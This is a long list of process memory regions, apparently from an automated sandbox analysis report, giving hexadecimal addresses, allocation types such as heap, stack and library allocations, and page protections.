2403AA16000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
2132000
|
heap
|
page read and write
|
||
2720000
|
heap
|
page execute and read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BE53000
|
trusted library allocation
|
page read and write
|
||
1BDC46A0000
|
trusted library allocation
|
page read and write
|
||
1C2B0000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
29A3000
|
trusted library allocation
|
page read and write
|
||
53AC000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1F3DAD10000
|
heap
|
page readonly
|
||
1B819000
|
heap
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
7FFB4B400000
|
trusted library allocation
|
page read and write
|
||
1B3C0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1BDDD021000
|
heap
|
page read and write
|
||
2A4AE7B0000
|
heap
|
page read and write
|
||
1B313000
|
trusted library allocation
|
page read and write
|
||
2403AE45000
|
heap
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1BDDCE2C000
|
heap
|
page read and write
|
||
2212EE83000
|
heap
|
page read and write
|
||
730000
|
heap
|
page read and write
|
||
24032585000
|
trusted library allocation
|
page read and write
|
||
BF087FB000
|
stack
|
page read and write
|
||
1BF60000
|
trusted library allocation
|
page read and write
|
||
2E1F000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F9E0453000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
240322B0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F3DAB40000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0D58000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1B580000
|
trusted library allocation
|
page read and write
|
||
2740000
|
trusted library allocation
|
page read and write
|
||
1F9DE0BC000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0C91000
|
heap
|
page read and write
|
||
1B5D9000
|
heap
|
page read and write
|
||
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
1B330000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BDC5692000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7DF43B4E4000
|
unkown
|
page read and write
|
||
7DF43B4E6000
|
unkown
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
2403A74D000
|
heap
|
page read and write
|
||
2403AE49000
|
heap
|
page read and write
|
||
1B4B5000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC5000
|
heap
|
page read and write
|
||
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
5448000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
2403A2A1000
|
heap
|
page read and write
|
||
1C360000
|
trusted library allocation
|
page read and write
|
||
1AA3FFCB000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
7FFB4B33C000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E06C0000
|
heap
|
page read and write
|
||
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
1B170000
|
trusted library allocation
|
page read and write
|
||
1BDC4713000
|
trusted library allocation
|
page read and write
|
||
1BD50000
|
trusted library allocation
|
page read and write
|
||
1B660000
|
trusted library allocation
|
page read and write
|
||
1AA401C6000
|
heap
|
page read and write
|
||
1AA41F7E000
|
heap
|
page read and write
|
||
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B422000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B660000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
895000
|
unkown
|
page readonly
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1AA41980000
|
heap
|
page read and write
|
||
2B8A000
|
trusted library allocation
|
page read and write
|
||
1F9E0D78000
|
heap
|
page read and write
|
||
1F9E045E000
|
heap
|
page read and write
|
||
7FFB4B570000
|
trusted library allocation
|
page read and write
|
||
1BE90000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0356000
|
heap
|
page read and write
|
||
1C0BB000
|
unkown
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
3C038F7000
|
stack
|
page read and write
|
||
1AF75000
|
heap
|
page read and write
|
||
3C034FE000
|
stack
|
page read and write
|
||
1F9E0428000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
24D916A0000
|
heap
|
page read and write
|
||
B78000
|
stack
|
page read and write
|
||
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
8AD000
|
unkown
|
page readonly
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FFB4B28B000
|
trusted library allocation
|
page execute and read and write
|
||
2E55000
|
trusted library allocation
|
page read and write
|
||
1BDC687C000
|
trusted library allocation
|
page read and write
|
||
7FFB4B27D000
|
trusted library allocation
|
page execute and read and write
|
||
1B6C0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1BE90000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1AA41F7E000
|
heap
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
7FFB4B560000
|
trusted library allocation
|
page read and write
|
||
7FFB4B26D000
|
trusted library allocation
|
page execute and read and write
|
||
1B461000
|
heap
|
page read and write
|
||
1B303000
|
trusted library allocation
|
page read and write
|
||
1BE53000
|
trusted library allocation
|
page read and write
|
||
1BDDD019000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B67F000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F3EC7C1000
|
trusted library allocation
|
page read and write
|
||
1AA41EB3000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FF7F0929000
|
direct allocation
|
page execute and read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC6000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
22130923000
|
heap
|
page read and write
|
||
7FFB4B530000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
54D1000
|
heap
|
page read and write
|
||
96C44FD000
|
stack
|
page read and write
|
||
7FFB4B594000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
remote allocation
|
page read and write
|
||
1B54C000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1BF00000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
BF149CD000
|
stack
|
page read and write
|
||
7FFB4B3A0000
|
trusted library allocation
|
page execute and read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1BF70000
|
trusted library allocation
|
page read and write
|
||
1F3DD1BB000
|
trusted library allocation
|
page read and write
|
||
1F3F4D80000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0888000
|
heap
|
page read and write
|
||
7FFB4B346000
|
trusted library allocation
|
page execute and read and write
|
||
DEB000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
1AA4199A000
|
heap
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1BDC47FC000
|
heap
|
page read and write
|
||
979000
|
unkown
|
page readonly
|
||
21F1000
|
heap
|
page read and write
|
||
7FFB4B243000
|
trusted library allocation
|
page execute and read and write
|
||
7DF43B4E1000
|
unkown
|
page execute read
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C330000
|
trusted library allocation
|
page read and write
|
||
12A0000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
1F9E02FF000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
2EB0000
|
trusted library allocation
|
page read and write
|
||
2212EE70000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1C0F0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F3F4B5F000
|
heap
|
page read and write
|
||
2A4AD005000
|
heap
|
page read and write
|
||
1F9E034D000
|
heap
|
page read and write
|
||
1C3A3000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
2212F070000
|
heap
|
page read and write
|
||
8A9000
|
unkown
|
page readonly
|
||
1C4A0000
|
trusted library allocation
|
page read and write
|
||
3C03BFB000
|
stack
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
3C037F8000
|
stack
|
page read and write
|
||
BF0897C000
|
stack
|
page read and write
|
||
1B660000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
28C0000
|
direct allocation
|
page execute and read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1BDC4A50000
|
heap
|
page execute and read and write
|
||
28B0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
7FF63D2DC000
|
unkown
|
page readonly
|
||
24032589000
|
trusted library allocation
|
page read and write
|
||
2E13000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E01F7000
|
heap
|
page read and write
|
||
1BE63000
|
trusted library allocation
|
page read and write
|
||
1AA3FFEC000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E07C6000
|
unkown
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B280000
|
trusted library allocation
|
page read and write
|
||
1F9E0415000
|
heap
|
page read and write
|
||
2A4ACCB0000
|
heap
|
page read and write
|
||
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
872B1FE000
|
stack
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1BFF0000
|
trusted library allocation
|
page read and write
|
||
1F3DAD60000
|
trusted library allocation
|
page read and write
|
||
7FFB4B3FA000
|
trusted library allocation
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1F3DACE0000
|
trusted library allocation
|
page read and write
|
||
2403ABA9000
|
heap
|
page read and write
|
||
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
C40000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
1AA3FFEC000
|
heap
|
page read and write
|
||
28C3000
|
trusted library allocation
|
page read and write
|
||
1F9DDF20000
|
unkown
|
page execute and read and write
|
||
1BDC67FC000
|
trusted library allocation
|
page read and write
|
||
7FFB4B6B0000
|
trusted library allocation
|
page read and write
|
||
1BDC0000
|
trusted library allocation
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
1C370000
|
trusted library allocation
|
page read and write
|
||
2E5D000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4D0000
|
trusted library allocation
|
page read and write
|
||
1C560000
|
trusted library allocation
|
page read and write
|
||
1C549000
|
trusted library allocation
|
page read and write
|
||
6A7000
|
unkown
|
page readonly
|
||
1F3EC7E1000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
31EF000
|
stack
|
page read and write
|
||
7DF43B4EA000
|
unkown
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
7FF7F03B0000
|
direct allocation
|
page execute and read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B3C0000
|
trusted library allocation
|
page read and write
|
||
1C5A0000
|
trusted library allocation
|
page read and write
|
||
1BDC6255000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
24020707000
|
heap
|
page read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E05E8000
|
unkown
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E042D000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F3DABC0000
|
heap
|
page read and write
|
||
12EB000
|
heap
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
1F3F4BED000
|
heap
|
page read and write
|
||
2950000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1C2AD000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1F3F4B4C000
|
heap
|
page read and write
|
||
1BDC69EE000
|
trusted library allocation
|
page read and write
|
||
7FFB4B510000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1BDDCE58000
|
heap
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
7FFB4B430000
|
trusted library allocation
|
page execute and read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1F3DE5F8000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1B5B7000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
1B5C4000
|
heap
|
page read and write
|
||
1B430000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1BDDCFF8000
|
heap
|
page read and write
|
||
1B380000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
7FFB4B390000
|
trusted library allocation
|
page execute and read and write
|
||
1AA41979000
|
heap
|
page read and write
|
||
7FFB4B244000
|
trusted library allocation
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1C3D0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
5300000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page execute and read and write
|
||
1C500000
|
trusted library allocation
|
page read and write
|
||
1F3F51F0000
|
heap
|
page read and write
|
||
1AA41F50000
|
heap
|
page read and write
|
||
1C300000
|
trusted library allocation
|
page read and write
|
||
1BEC0000
|
trusted library allocation
|
page read and write
|
||
231A8830000
|
heap
|
page read and write
|
||
7FFB4B27D000
|
trusted library allocation
|
page execute and read and write
|
||
1C070000
|
trusted library allocation
|
page read and write
|
||
1C390000
|
trusted library allocation
|
page read and write
|
||
1F3DD34F000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
7FFB4B530000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
7FFB4B340000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BFC0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BDC61FA000
|
trusted library allocation
|
page read and write
|
||
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
direct allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B26D000
|
trusted library allocation
|
page execute and read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1C4E0000
|
trusted library allocation
|
page read and write
|
||
22130C3C000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
24023C11000
|
trusted library allocation
|
page read and write
|
||
3C0347E000
|
stack
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E7000
|
trusted library allocation
|
page read and write
|
||
7FFB4B540000
|
trusted library allocation
|
page read and write
|
||
1BDDCE4D000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1B81C000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
7FF63D3FB000
|
unkown
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1F9E01F7000
|
heap
|
page read and write
|
||
1C2E0000
|
trusted library allocation
|
page read and write
|
||
2403A743000
|
heap
|
page read and write
|
||
1F3F4CB3000
|
heap
|
page read and write
|
||
1C2C0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1C200000
|
trusted library allocation
|
page read and write
|
||
1B420000
|
heap
|
page read and write
|
||
2750000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
7FFB4B24D000
|
trusted library allocation
|
page execute and read and write
|
||
D09000
|
heap
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1F9E042B000
|
heap
|
page read and write
|
||
BF0887E000
|
stack
|
page read and write
|
||
7FFB4B690000
|
trusted library allocation
|
page read and write
|
||
1BDDCE2F000
|
heap
|
page read and write
|
||
1F3DD5E2000
|
trusted library allocation
|
page read and write
|
||
BF14C7E000
|
stack
|
page read and write
|
||
24023258000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5C0000
|
trusted library allocation
|
page read and write
|
||
1C09A000
|
stack
|
page read and write
|
||
1F3F4B56000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page execute and read and write
|
||
1F9DF9D0000
|
trusted library allocation
|
page read and write
|
||
1BD40000
|
trusted library allocation
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
7FFB4B5A0000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
24023D80000
|
trusted library allocation
|
page read and write
|
||
1B81D000
|
heap
|
page read and write
|
||
1AA3FFA0000
|
heap
|
page read and write
|
||
1AA41FBF000
|
heap
|
page read and write
|
||
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
1C330000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
24D916AE000
|
heap
|
page read and write
|
||
1BDDCDA0000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1F3F4B69000
|
heap
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
872BABF000
|
stack
|
page read and write
|
||
7FFB4B5A2000
|
trusted library allocation
|
page read and write
|
||
1F3DE127000
|
trusted library allocation
|
page read and write
|
||
DD5000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7DF40FFC0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
3C03123000
|
stack
|
page read and write
|
||
2E19000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1C080000
|
trusted library allocation
|
page read and write
|
||
28D0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B460000
|
trusted library allocation
|
page execute and read and write
|
||
1BDC47E0000
|
heap
|
page read and write
|
||
69F000
|
unkown
|
page read and write
|
||
1620000
|
heap
|
page read and write
|
||
1C575000
|
unkown
|
page read and write
|
||
1F3F4E91000
|
heap
|
page read and write
|
||
1BDD0000
|
trusted library allocation
|
page read and write
|
||
1BDD4C10000
|
trusted library allocation
|
page read and write
|
||
2403AB34000
|
heap
|
page read and write
|
||
1B440000
|
trusted library allocation
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
BF0837E000
|
stack
|
page read and write
|
||
7FFBAA4AD000
|
unkown
|
page readonly
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1C1B0000
|
trusted library allocation
|
page read and write
|
||
1C510000
|
trusted library allocation
|
page read and write
|
||
7FFB4B3FA000
|
trusted library allocation
|
page read and write
|
||
1F9E0503000
|
heap
|
page read and write
|
||
1F3DACBA000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
BF08678000
|
stack
|
page read and write
|
||
7FFB4B5B0000
|
trusted library allocation
|
page read and write
|
||
A7E1AFF000
|
stack
|
page read and write
|
||
22130828000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1F3DAE10000
|
heap
|
page read and write
|
||
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
1C1F0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B220000
|
heap
|
page execute and read and write
|
||
7FFB4B244000
|
trusted library allocation
|
page read and write
|
||
1BA12000
|
direct allocation
|
page execute and read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0357000
|
heap
|
page read and write
|
||
24023D96000
|
trusted library allocation
|
page read and write
|
||
1B420000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
7FFB4B5A8000
|
trusted library allocation
|
page read and write
|
||
1F9E042A000
|
heap
|
page read and write
|
||
2E1C000
|
trusted library allocation
|
page read and write
|
||
DCD000
|
heap
|
page read and write
|
||
24022070000
|
trusted library allocation
|
page read and write
|
||
1B530000
|
heap
|
page read and write
|
||
1C2E0000
|
unkown
|
page read and write
|
||
1C2A0000
|
trusted library allocation
|
page read and write
|
||
2403AE00000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BDC6267000
|
trusted library allocation
|
page read and write
|
||
24D913B0000
|
heap
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E042A000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
63FC000
|
stack
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E042D000
|
heap
|
page read and write
|
||
1F9DF9D0000
|
direct allocation
|
page read and write
|
||
1B86F000
|
heap
|
page read and write
|
||
3C039FE000
|
stack
|
page read and write
|
||
1C490000
|
trusted library allocation
|
page read and write
|
||
1BDC2D80000
|
heap
|
page read and write
|
||
1B7F1000
|
heap
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
1C450000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1B3B0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
53A3000
|
heap
|
page read and write
|
||
1F9DE0AE000
|
heap
|
page read and write
|
||
2A4ACE08000
|
heap
|
page read and write
|
||
2212F074000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
24020590000
|
heap
|
page read and write
|
||
1C000000
|
unkown
|
page read and write
|
||
1C180000
|
trusted library allocation
|
page read and write
|
||
1C520000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
F17627E000
|
stack
|
page read and write
|
||
1C230000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B700000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1F3F5080000
|
heap
|
page read and write
|
||
2A4ACCF0000
|
heap
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1BE00000
|
heap
|
page read and write
|
||
1BDA0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1B5AD000
|
heap
|
page read and write
|
||
767000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
7FFB4B457000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B25D000
|
trusted library allocation
|
page execute and read and write
|
||
1BF30000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
20F0000
|
heap
|
page read and write
|
||
1BE51000
|
trusted library allocation
|
page read and write
|
||
7FFB4B64C000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BE52000
|
trusted library allocation
|
page read and write
|
||
1B3AE000
|
stack
|
page read and write
|
||
1B700000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
1F3DAC48000
|
heap
|
page read and write
|
||
1BDC4660000
|
heap
|
page read and write
|
||
7FFB4B663000
|
trusted library allocation
|
page read and write
|
||
2403A8B0000
|
heap
|
page read and write
|
||
1B303000
|
trusted library allocation
|
page read and write
|
||
538A000
|
heap
|
page read and write
|
||
24023520000
|
trusted library allocation
|
page read and write
|
||
2A4ACBAC000
|
unkown
|
page read and write
|
||
872B5FE000
|
stack
|
page read and write
|
||
1F3EC7F1000
|
trusted library allocation
|
page read and write
|
||
1B460000
|
trusted library allocation
|
page read and write
|
||
872B57A000
|
stack
|
page read and write
|
||
2600000
|
heap
|
page read and write
|
||
1F9E01A9000
|
heap
|
page read and write
|
||
872B172000
|
stack
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
7FFB4B710000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
14B0000
|
heap
|
page read and write
|
||
1BD30000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B313000
|
trusted library allocation
|
page read and write
|
||
2403ACB0000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F3DAD50000
|
heap
|
page read and write
|
||
231A86D0000
|
unkown
|
page read and write
|
||
1F3F4F54000
|
heap
|
page read and write
|
||
